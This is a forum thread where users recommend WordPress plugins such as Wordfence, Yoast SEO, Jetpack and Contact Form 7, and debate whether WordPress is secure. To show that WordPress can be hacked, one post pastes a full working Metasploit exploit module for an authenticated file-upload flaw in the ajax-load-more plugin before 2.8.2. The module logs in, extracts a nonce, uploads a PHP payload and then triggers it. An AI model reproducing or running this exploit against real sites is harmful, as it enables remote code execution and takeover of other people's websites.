What are your favorite Wordpress Plugins?

[aceofadsense]

Are you running a blog on Wordpress CMS? What are Your favorite Wordpress Plugins that you would recommend to use for better blogging?

 

[SIG]

My favorite WordPress plugins are:

1. WordFence (Security plugin) - very important plugin.
2. Jetpack (by WordPress) - good to viewing visitors, search terms, what visitors clicked on, where did they came from, etc. - It also comes with a bunch of handy features.
3. WPSmush - to reduce image sizes - good for speeding up a little bit your blog/site.
4. Contact form 7 - good contact form creator.

This is quite it.

 

[Hugo E.]

Hugo E.

According to my personal opinion, WP is already secure why you need a security plugin for it..It's weird.

 

[SIG]

SIG

WordPress has vulnerabilities, and can be hacked. And I can prove it.

This is the most recent one:
WordPress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability

Discovered on: 2015-10-18

Going offtopic with this:

##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
   
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
   
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
     
    register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
   
  def user
    datastore['WP_USER']
  end
   
  def password
    datastore['WP_PASSWORD']
  end
   
  def check
    # Check plugin version
    ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
    if ver
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
   
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
     
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
     
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end
 
    print_status("#{peer} - Trying to upload payload")
     
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
     
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
     
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end

 

[LatiaEmmie]

This can affect to WordPress 4.3.1?

 

[SenseiSteve]

SEO by Yoast
WordFence
Contact Form 7
WP Edit

And yes, WordPress sites get hacked all the time. Keeping your themes and plugins up to date helps, but make sure you download plugins from authority sites and ensure they stay up to date with the current version of WordPress.

 

[ulterios]

It all depends on the site in some cases, but in general here are my favorites:

WordFence Security - Lots of good features and has a cache option which actually works real well

Slider Captcha - Keeps bots from trying to login to my site as well as eliminate spam

Google Analytics Dashboard for WP - To keep track of traffic and visitors

All In One SEO Pack - A lot of good stuff to make some SEO tasks easier.

 

[Ron Killian]

I agree Wordpress can be hacked. Anything can be hacked. Though most people who own wordpress have NO clue how many times each day people (bots) try to break in. Until you have a good security plugin, then you see what the bad guys are trying to do.

I put in another vote for Wordfence, great plugin.

Tried several image compression plugins, but best I found was Kraken. Works great.

Also like Intense Wordpress plugin. Ton's of shortcodes to dress up my content very nicely.

Disqus for comments.

As Ulterios said, Google analytics dashboard is nice.

MCE table button, gotta have tables.

Premium SEO pack - for obvious reasons.

Q2W3 Fixed Widget - Fixes widgets you want to stay in the sidebar as people scroll.

Simple Page Sidebars - Make custom sidebars and any post or page.

Uber Menu for better menu's, bigger, ect.

Wp Author Box - Much better author box.

WP Ad Pro to rotate ads and banners, track ad stats.

Just started using Zendesk for support. Think I like it. Can't say 100% yet. But there are not many good support plugins out there.

Woocommerce and many related plug-ins for it.

 

[dnapick]

It depends on a project but I always use;

SEo by Yoast
Custom CSS
WP Super Cache

 

[tayyabwpb]

My Favorites SEO Plugins are

1. Analytify for Google Analytics
2. Yoast SEO for SEO purpose
3. WP Rocket for Website Speed Optimization
4. Imagify for Image Optimization
5. Autoptimize for CSS & JS minification
6. LoginPress for custom login page & Login Page Security

 

[anad7kumar]

My favorite plugins are Elementor, Starter Sites Kit, Yoast SEO, and Classic Editor.

 

[zinavoindia]

My all-time favorite plugin is Yoast Plugin.

 

[Daniel@30]

1. Yoast SEO: Helps optimize content for search engines and improves overall SEO.
2. WP Super Cache: Speeds up website performance by generating static HTML files for faster page loads.
3. Elementor: A user-friendly page builder that simplifies website design and customization.